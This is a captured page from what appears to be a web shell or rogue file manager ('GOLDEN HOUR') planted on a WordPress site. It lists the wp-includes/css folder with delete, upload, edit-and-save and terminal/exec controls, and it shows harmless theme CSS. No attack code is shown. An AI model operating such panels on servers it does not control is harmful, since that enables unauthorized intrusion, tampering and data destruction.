GOLDEN HOUR
DIR: /home/vlabbdco/public_html/wp/wp-includes/css
UP
UPLOAD
Name
Size
Action
admin-bar-rtl.css
24.16 KB
DEL
admin-bar-rtl.min.css
19.84 KB
DEL
admin-bar.css
24.12 KB
DEL
admin-bar.min.css
19.84 KB
DEL
buttons-rtl.css
9.49 KB
DEL
buttons-rtl.min.css
5.79 KB
DEL
buttons.css
9.45 KB
DEL
buttons.min.css
5.79 KB
DEL
classic-themes.css
729 B
DEL
classic-themes.min.css
291 B
DEL
customize-preview-rtl.css
3.58 KB
DEL
customize-preview-rtl.min.css
2.81 KB
DEL
customize-preview.css
3.54 KB
DEL
customize-preview.min.css
2.8 KB
DEL
dashicons.css
60.9 KB
DEL
dashicons.min.css
57.63 KB
DEL
[ dist ]
-
DEL
editor-rtl.css
31.96 KB
DEL
editor-rtl.min.css
26.34 KB
DEL
editor.css
31.92 KB
DEL
editor.min.css
26.34 KB
DEL
jquery-ui-dialog-rtl.css
5.83 KB
DEL
jquery-ui-dialog-rtl.min.css
4.45 KB
DEL
jquery-ui-dialog.css
5.79 KB
DEL
jquery-ui-dialog.min.css
4.44 KB
DEL
media-views-rtl.css
56.07 KB
DEL
media-views-rtl.min.css
45.33 KB
DEL
media-views.css
56.03 KB
DEL
media-views.min.css
45.32 KB
DEL
wp-auth-check-rtl.css
2.49 KB
DEL
wp-auth-check-rtl.min.css
1.87 KB
DEL
wp-auth-check.css
2.45 KB
DEL
wp-auth-check.min.css
1.87 KB
DEL
wp-embed-template-ie.css
1.44 KB
DEL
wp-embed-template-ie.min.css
1.44 KB
DEL
wp-embed-template.css
7.75 KB
DEL
wp-embed-template.min.css
6.8 KB
DEL
wp-pointer-rtl.css
3.97 KB
DEL
wp-pointer-rtl.min.css
3.17 KB
DEL
wp-pointer.css
3.93 KB
DEL
wp-pointer.min.css
3.16 KB
DEL
Edit: classic-themes.css
/** * These rules are needed for backwards compatibility. * They should match the button element rules in the base theme.json file. */ .wp-block-button__link { color: #ffffff; background-color: #32373c; border-radius: 9999px; /* 100% causes an oval, but any explicit but really high value retains the pill shape. */ /* This needs a low specificity so it won't override the rules from the button element if defined in theme.json. */ box-shadow: none; text-decoration: none; /* The extra 2px are added to size solids the same as the outline versions.*/ padding: calc(0.667em + 2px) calc(1.333em + 2px); font-size: 1.125em; } .wp-block-file__button { background: #32373c; color: #ffffff; text-decoration: none; }
SAVE FILE
TERMINAL
EXEC